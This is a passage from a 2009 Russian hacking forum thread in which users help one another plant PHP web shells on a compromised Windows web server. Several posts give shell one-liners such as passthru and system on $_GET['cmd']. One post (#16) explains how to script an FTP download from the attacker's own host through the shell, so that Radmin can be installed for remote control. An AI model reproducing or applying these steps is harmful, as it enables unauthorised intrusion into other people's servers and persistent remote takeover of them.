ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.02.2009, 16:47
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Тогда так:

echo ^<?php passthru $cmd?^> > "D:\Website\WWW\1.php"
 
Ответить с цитированием

  #12  
Старый 06.02.2009, 16:50
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Создай сначала сам файл: echo > 1.php
Затем отредакти его: edit > 1.php
и впиши свой код, затем сохрани и все)
 
Ответить с цитированием

  #13  
Старый 06.02.2009, 17:12
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

просто сервак глюченый , ничего не получилось)!
 
Ответить с цитированием

  #14  
Старый 06.02.2009, 18:12
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

смотри за пробелами!!!
<? phpinfo(); ?>

попробуй так еще:
эхом создаешь файл с кавычками, через more - попробуй их убрать потом.
ну а если сделаешь вместо кавычек табуляцию, то потом:
more /T1 file.php
 
Ответить с цитированием

  #15  
Старый 06.02.2009, 18:21
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

что там с правами
ибо в той дире де бажный скрипт работает php

В чем может быть дело еще?
 
Ответить с цитированием

  #16  
Старый 16.02.2009, 17:09
Аватар для schwarze
schwarze
Познающий
Регистрация: 01.12.2008
Сообщений: 68
Провел на форуме:
484662

Репутация: 143
Отправить сообщение для schwarze с помощью ICQ
По умолчанию

У меня была подобная ситуация. У меня был шел вида <?php system(cmd) ?>. Вся проблема состоит в том, что тебе дает выполнять только одну команду. И команда edit ничего не даст. Решение было такое - так как "сервак" виндовый - можно залить Radmin и уже спомощью него можно делать что угодно.
Залить лучше всего через ФТП. команды такие
Код:
echo open ТВОЙ_FTP>go
echo binary >>go
echo get файл>go
....
echo bye>go
Запускать потом (ftp анонимный)
site.com/shell.php?cmd=ftp -A -s:go
 
Ответить с цитированием

  #17  
Старый 17.02.2009, 10:18
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

fly, я не понимаю в чём там проблема. ДОлжно всё работать. Объясни подробнее что не получаеся.

Может просто регистрГолобалз ОФФ? ТОгда нужно шелл такой создавать:

<?system($_GET[cmd]);?>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как запустить файл win32 из под cmd? Student :) Болталка 12 03.11.2009 07:53
Можно ли потушить Outpost Firewall 3.0с Cmd donetsk АнтиАдмин 33 01.02.2009 21:01
CMD sadfeel АнтиАдмин 13 08.12.2008 18:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ